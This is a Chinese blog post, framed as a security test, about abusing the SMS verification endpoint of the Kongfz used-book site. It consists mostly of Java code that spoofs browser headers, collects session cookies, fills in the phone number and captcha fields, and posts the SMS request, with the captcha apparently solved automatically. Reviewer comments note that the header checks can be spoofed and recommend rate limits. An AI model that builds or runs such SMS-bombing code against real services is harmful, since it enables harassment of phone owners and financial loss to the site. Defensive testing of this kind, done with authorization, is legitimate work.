短信测评系列:孔夫子旧书网短信接口安全测试——你的短信接口被攻击到底有多危险?可能瞬间损失过万。短信接口防盗刷测试
发布时间:2021-04-10 点击数:3200
安全问题不容忽视,不要亡羊补牢!
//配置请求头
/**
 * Fills {@code inheads} with the headers used for the follow-up request to login.kongfz.com
 * and returns that same table.
 *
 * <p>Every header value below is a constant picked by this client. A server receiving the
 * request therefore cannot treat {@code Origin}, {@code Referer} or {@code X-Requested-With}
 * as evidence of a genuine browser session; abuse protection for the SMS endpoint has to rest
 * on checks the client cannot set for itself.
 *
 * @param httpclient  HTTP client handed to {@code getCookie}
 * @param cookieStore cookie store handed to {@code getCookie}
 * @param inheads     header table that is populated in place and returned
 * @param outheads    map passed to {@code getCookie} and then serialised into the Cookie header
 * @param input       not read by this method
 * @return {@code inheads}, typed as {@code Object}
 */
public Object setHeads(CloseableHttpClient httpclient, CookieStore cookieStore, Hashtable<String, String> inheads,
        LinkedHashMap<String, String> outheads, Hashtable<String, String> input) {
    // getCookie is defined elsewhere; presumably it loads the registration page and records
    // the session cookies in outheads - confirm against its implementation.
    getCookie(cookieStore, httpclient, "https://login.kongfz.com/register/index.html", inheads, outheads);

    final String joinedCookies = GetCookieHead.CookieHashToString(outheads);
    // Hashtable rejects null values, so the Cookie header is only set when a string came back.
    if (null != joinedCookies) {
        inheads.put("Cookie", joinedCookies);
    }

    // Static headers, applied in the same order as before.
    final String[][] fixedHeaders = {
        {"Host", "login.kongfz.com"},
        {"Accept", "application/json, text/javascript, */*; q=0.01"},
        {"Origin", "https://login.kongfz.com"},
        {"X-Requested-With", "XMLHttpRequest"},
        {"Content-Type", "application/x-www-form-urlencoded; charset=UTF-8"},
        {"Referer", "https://login.kongfz.com/Pc/Login/iframe"},
    };
    for (String[] header : fixedHeaders) {
        inheads.put(header[0], header[1]);
    }
    return inheads;
}
//配置请求参数
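/**
 * Builds the form fields for the SMS request: {@code mobile}, {@code captchaCode} and
 * {@code bizType}.
 *
 * <p>NOTE(review): of these three fields only {@code captchaCode} is something the server can
 * verify. The endpoint under test needs to check it server-side against the session that
 * issued the image, and to limit sends per number and per source independently of it.
 *
 * @param httpclient  not read by this method
 * @param cookieStore not read by this method
 * @param inheads     not read by this method
 * @param outheads    not read by this method
 * @param input       supplies the captcha text under the key {@code "imgCode"}; a missing key
 *                    yields a {@code null} field value
 * @param phone       number sent as the {@code mobile} field
 * @return the parameter list, typed as {@code Object}
 */
public Object setParams(CloseableHttpClient httpclient, CookieStore cookieStore, Hashtable<String, String> inheads, LinkedHashMap<String, String> outheads, Hashtable<String, String> input, String phone) {
    // Fix: the list was declared as paramList but the adds went to paramsList, a name this
    // method never declares. That either fails to compile or, if a field of that name exists
    // outside this view, returns an empty list. One name is now used throughout.
    List<BasicNameValuePair> paramList = new ArrayList<>();
    paramList.add(new BasicNameValuePair("mobile", phone));
    paramList.add(new BasicNameValuePair("captchaCode", input.get("imgCode")));
    // The meaning of bizType "2" is not shown here - presumably it selects the SMS purpose; confirm.
    paramList.add(new BasicNameValuePair("bizType", "2"));
    return paramList;
}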
//配置请求
/**
 * Runs one test pass against the SMS interface: obtains the image-captcha text, stores it in
 * {@code input} under {@code "imgCode"}, then issues the SMS request through {@code userClick}.
 *
 * <p>NOTE(review): {@code getImgeCode} and {@code userClick} are defined elsewhere. Judging by
 * the names, the captcha text is produced without a human in the loop - confirm. If so, the
 * image captcha alone does not throttle this flow, and the interface needs server-side send
 * limits per number and per source.
 *
 * @param httpclient  HTTP client shared by both calls
 * @param cookieStore cookie store shared by both calls
 * @param input       working table; receives the {@code "imgCode"} entry
 * @param phone       number the SMS request is made for
 * @return the result of {@code userClick}, which is also stored in {@code retEntity}
 */
public RetEntity reg(CloseableHttpClient httpclient, CookieStore cookieStore, Hashtable<String, String> input, String phone) {
    final Hashtable<String, String> inheads = new Hashtable<>();
    final LinkedHashMap<String, String> outheads = new LinkedHashMap<>();

    final String captchaText = this.getImgeCode(phone, httpclient, cookieStore, "get", imgUrl, inheads, outheads,
            input, imgOutMap);

    // Hashtable cannot hold null, so a missing captcha result is stored as an empty string.
    if (captchaText == null) {
        input.put("imgCode", "");
    } else {
        input.put("imgCode", captchaText);
    }

    retEntity = this.userClick(httpclient, cookieStore, "post", smsUrl, inheads, outheads, input, phone);
    return retEntity;
}